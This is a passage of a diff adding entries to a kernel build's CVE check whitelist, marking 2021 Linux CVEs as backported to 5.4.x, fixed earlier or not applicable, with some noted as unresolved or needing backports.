+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2021-0447"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-0448"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-0512"
+
+# cpe-stable-backport: Backported in 5.4.68
+CVE_CHECK_WHITELIST += "CVE-2021-0605"
+
+# CVE-2021-0606 has no known resolution
+
+# CVE-2021-0695 has no known resolution
+
+# fixed-version: only affects 5.8rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-0707"
+
+# cpe-stable-backport: Backported in 5.4.137
+CVE_CHECK_WHITELIST += "CVE-2021-0920"
+
+# CVE-2021-0924 has no known resolution
+
+# CVE-2021-0929 needs backporting (fixed from 5.6rc1)
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2021-0935"
+
+# CVE-2021-0936 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-0937"
+
+# cpe-stable-backport: Backported in 5.4.84
+CVE_CHECK_WHITELIST += "CVE-2021-0938"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-0941"
+
+# CVE-2021-0961 has no known resolution
+
+# fixed-version: only affects 5.9rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-1048"
+
+# CVE-2021-20177 needs backporting (fixed from 5.5rc1)
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20194"
+
+# CVE-2021-20219 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20226"
+
+# CVE-2021-20239 needs backporting (fixed from 5.9rc1)
+
+# fixed-version: Fixed after version 4.5rc5
+CVE_CHECK_WHITELIST += "CVE-2021-20261"
+
+# fixed-version: Fixed after version 4.5rc3
+CVE_CHECK_WHITELIST += "CVE-2021-20265"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-20268"
+
+# cpe-stable-backport: Backported in 5.4.59
+CVE_CHECK_WHITELIST += "CVE-2021-20292"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-20317"
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-20320"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-20321"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-20322"
+
+# cpe-stable-backport: Backported in 5.4.99
+CVE_CHECK_WHITELIST += "CVE-2021-21781"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-22543"
+
+# cpe-stable-backport: Backported in 5.4.113
+CVE_CHECK_WHITELIST += "CVE-2021-22555"
+
+# fixed-version: only affects 5.6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-22600"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-23133"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-23134"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2021-26401"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-26708"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26930"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26931"
+
+# cpe-stable-backport: Backported in 5.4.100
+CVE_CHECK_WHITELIST += "CVE-2021-26932"
+
+# CVE-2021-26934 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27363"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27364"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-27365"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-28038"
+
+# fixed-version: only affects 5.9rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28039"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28375"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-28660"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-28688"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28691"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28711"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28712"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28713"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28714"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-28715"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28950"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28951"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-28952"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28964"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28971"
+
+# cpe-stable-backport: Backported in 5.4.108
+CVE_CHECK_WHITELIST += "CVE-2021-28972"
+
+# cpe-stable-backport: Backported in 5.4.111
+CVE_CHECK_WHITELIST += "CVE-2021-29154"
+
+# CVE-2021-29155 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29264"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-29265"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29266"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29646"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29647"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29648"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29649"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-29650"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-29657"
+
+# cpe-stable-backport: Backported in 5.4.103
+CVE_CHECK_WHITELIST += "CVE-2021-30002"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-30178"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-31440"
+
+# cpe-stable-backport: Backported in 5.4.92
+CVE_CHECK_WHITELIST += "CVE-2021-3178"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-31829"
+
+# cpe-stable-backport: Backported in 5.4.109
+CVE_CHECK_WHITELIST += "CVE-2021-31916"
+
+# CVE-2021-32078 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-32399"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-32606"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-33033"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-33034"
+
+# CVE-2021-33061 needs backporting (fixed from 5.18rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-33098"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33135"
+
+# fixed-version: only affects 5.12rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-33200"
+
+# cpe-stable-backport: Backported in 5.4.94
+CVE_CHECK_WHITELIST += "CVE-2021-3347"
+
+# cpe-stable-backport: Backported in 5.4.95
+CVE_CHECK_WHITELIST += "CVE-2021-3348"
+
+# cpe-stable-backport: Backported in 5.4.139
+CVE_CHECK_WHITELIST += "CVE-2021-33624"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2021-33630"
+
+# cpe-stable-backport: Backported in 5.4.240
+CVE_CHECK_WHITELIST += "CVE-2021-33631"
+
+# cpe-stable-backport: Backported in 5.4.205
+CVE_CHECK_WHITELIST += "CVE-2021-33655"
+
+# cpe-stable-backport: Backported in 5.4.202
+CVE_CHECK_WHITELIST += "CVE-2021-33656"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-33909"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3411"
+
+# cpe-stable-backport: Backported in 5.4.62
+CVE_CHECK_WHITELIST += "CVE-2021-3428"
+
+# cpe-stable-backport: Backported in 5.4.101
+CVE_CHECK_WHITELIST += "CVE-2021-3444"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-34556"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-34693"
+
+# cpe-stable-backport: Backported in 5.4.110
+CVE_CHECK_WHITELIST += "CVE-2021-3483"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-34866"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3489"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3490"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3491"
+
+# CVE-2021-3492 has no known resolution
+
+# CVE-2021-3493 needs backporting (fixed from 5.11rc1)
+
+# cpe-stable-backport: Backported in 5.4.124
+CVE_CHECK_WHITELIST += "CVE-2021-34981"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3501"
+
+# cpe-stable-backport: Backported in 5.4.129
+CVE_CHECK_WHITELIST += "CVE-2021-35039"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-3506"
+
+# CVE-2021-3542 has no known resolution
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3543"
+
+# cpe-stable-backport: Backported in 5.4.146
+CVE_CHECK_WHITELIST += "CVE-2021-35477"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3564"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3573"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-3587"
+
+# cpe-stable-backport: Backported in 5.4.98
+CVE_CHECK_WHITELIST += "CVE-2021-3600"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2021-3609"
+
+# cpe-stable-backport: Backported in 5.4.102
+CVE_CHECK_WHITELIST += "CVE-2021-3612"
+
+# cpe-stable-backport: Backported in 5.4.14
+CVE_CHECK_WHITELIST += "CVE-2021-3635"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3640"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3653"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-3655"
+
+# cpe-stable-backport: Backported in 5.4.142
+CVE_CHECK_WHITELIST += "CVE-2021-3656"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-3659"
+
+# CVE-2021-3669 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-3679"
+
+# CVE-2021-3714 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.29
+CVE_CHECK_WHITELIST += "CVE-2021-3715"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-37159"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-3732"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-3736"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3739"
+
+# cpe-stable-backport: Backported in 5.4.128
+CVE_CHECK_WHITELIST += "CVE-2021-3743"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3744"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-3752"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-3753"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-37576"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2021-3759"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3760"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-3764"
+
+# cpe-stable-backport: Backported in 5.4.157
+CVE_CHECK_WHITELIST += "CVE-2021-3772"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38160"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38166"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38198"
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-38199"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38200"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38201"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38202"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38203"
+
+# cpe-stable-backport: Backported in 5.4.136
+CVE_CHECK_WHITELIST += "CVE-2021-38204"
+
+# cpe-stable-backport: Backported in 5.4.141
+CVE_CHECK_WHITELIST += "CVE-2021-38205"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38206"
+
+# fixed-version: only affects 5.6rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38207"
+
+# cpe-stable-backport: Backported in 5.4.125
+CVE_CHECK_WHITELIST += "CVE-2021-38208"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-38209"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-38300"
+
+# CVE-2021-3847 has no known resolution
+
+# CVE-2021-3864 has no known resolution
+
+# CVE-2021-3892 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-3894"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-3896"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-3923"
+
+# cpe-stable-backport: Backported in 5.4.144
+CVE_CHECK_WHITELIST += "CVE-2021-39633"
+
+# cpe-stable-backport: Backported in 5.4.70
+CVE_CHECK_WHITELIST += "CVE-2021-39634"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39636"
+
+# cpe-stable-backport: Backported in 5.4.89
+CVE_CHECK_WHITELIST += "CVE-2021-39648"
+
+# cpe-stable-backport: Backported in 5.4.106
+CVE_CHECK_WHITELIST += "CVE-2021-39656"
+
+# cpe-stable-backport: Backported in 5.4.93
+CVE_CHECK_WHITELIST += "CVE-2021-39657"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39685"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-39686"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2021-39698"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2021-39711"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39713"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2021-39714"
+
+# CVE-2021-39800 has no known resolution
+
+# CVE-2021-39801 has no known resolution
+
+# CVE-2021-39802 has no known resolution
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4001"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4002"
+
+# CVE-2021-4023 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4028"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4032"
+
+# cpe-stable-backport: Backported in 5.4.241
+CVE_CHECK_WHITELIST += "CVE-2021-4037"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2021-40490"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-4083"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4090"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4093"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4095"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-41073"
+
+# cpe-stable-backport: Backported in 5.4.168
+CVE_CHECK_WHITELIST += "CVE-2021-4135"
+
+# CVE-2021-4148 needs backporting (fixed from 5.15)
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2021-4149"
+
+# CVE-2021-4150 needs backporting (fixed from 5.15rc7)
+
+# cpe-stable-backport: Backported in 5.4.134
+CVE_CHECK_WHITELIST += "CVE-2021-4154"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-4155"
+
+# cpe-stable-backport: Backported in 5.4.120
+CVE_CHECK_WHITELIST += "CVE-2021-4157"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2021-4159"
+
+# cpe-stable-backport: Backported in 5.4.153
+CVE_CHECK_WHITELIST += "CVE-2021-41864"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2021-4197"
+
+# cpe-stable-backport: Backported in 5.4.143
+CVE_CHECK_WHITELIST += "CVE-2021-42008"
+
+# cpe-stable-backport: Backported in 5.4.162
+CVE_CHECK_WHITELIST += "CVE-2021-4202"
+
+# cpe-stable-backport: Backported in 5.4.151
+CVE_CHECK_WHITELIST += "CVE-2021-4203"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-4204"
+
+# CVE-2021-4218 needs backporting (fixed from 5.8rc1)
+
+# cpe-stable-backport: Backported in 5.4.148
+CVE_CHECK_WHITELIST += "CVE-2021-42252"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-42327"
+
+# cpe-stable-backport: Backported in 5.4.158
+CVE_CHECK_WHITELIST += "CVE-2021-42739"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43056"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43057"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-43267"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2021-43389"
+
+# cpe-stable-backport: Backported in 5.4.164
+CVE_CHECK_WHITELIST += "CVE-2021-43975"
+
+# cpe-stable-backport: Backported in 5.4.174
+CVE_CHECK_WHITELIST += "CVE-2021-43976"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-44733"
+
+# cpe-stable-backport: Backported in 5.4.260
+CVE_CHECK_WHITELIST += "CVE-2021-44879"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2021-45095"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45100"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45402"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2021-45469"
+
+# fixed-version: only affects 5.13rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-45480"
+
+# cpe-stable-backport: Backported in 5.4.133
+CVE_CHECK_WHITELIST += "CVE-2021-45485"
+
+# cpe-stable-backport: Backported in 5.4.119
+CVE_CHECK_WHITELIST += "CVE-2021-45486"
+
+# cpe-stable-backport: Backported in 5.4.160
+CVE_CHECK_WHITELIST += "CVE-2021-45868"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46283"
+
+# cpe-stable-backport: Backported in 5.4.112
+CVE_CHECK_WHITELIST += "CVE-2021-46904"
+
+# fixed-version: only affects 5.12rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46905"
+
+# cpe-stable-backport: Backported in 5.4.127
+CVE_CHECK_WHITELIST += "CVE-2021-46906"
+
+# CVE-2021-46908 needs backporting (fixed from 5.12rc8)
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46909"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46910"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46911"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46912"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46913"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46914"
+
+# cpe-stable-backport: Backported in 5.4.114
+CVE_CHECK_WHITELIST += "CVE-2021-46915"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46916"
+
+# fixed-version: only affects 5.8rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46917"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46918"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46919"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46920"
+
+# cpe-stable-backport: Backported in 5.4.115
+CVE_CHECK_WHITELIST += "CVE-2021-46921"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46922"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46923"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46924"
+
+# CVE-2021-46925 needs backporting (fixed from 5.16rc8)
+
+# CVE-2021-46926 needs backporting (fixed from 5.16rc7)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46927"
+
+# CVE-2021-46928 needs backporting (fixed from 5.16rc7)
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46929"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46930"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46931"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46932"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46933"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46934"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46935"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2021-46936"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46937"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46938"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46939"
+
+# fixed-version: only affects 5.10rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46940"
+
+# CVE-2021-46941 needs backporting (fixed from 5.13rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46942"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46943"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46944"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46945"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46947"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46948"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46949"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46950"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46951"
+
+# CVE-2021-46952 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46953"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46954"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46955"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46956"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46957"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46958"
+
+# CVE-2021-46959 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46960"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46961"
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46962"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46963"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46964"
+
+# CVE-2021-46965 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.118
+CVE_CHECK_WHITELIST += "CVE-2021-46966"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46967"
+
+# fixed-version: only affects 5.10rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46968"
+
+# CVE-2021-46969 needs backporting (fixed from 5.13rc1)
+
+# CVE-2021-46970 needs backporting (fixed from 5.13rc1)
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46971"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46972"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2021-46973"
+
+# cpe-stable-backport: Backported in 5.4.117
+CVE_CHECK_WHITELIST += "CVE-2021-46974"
+
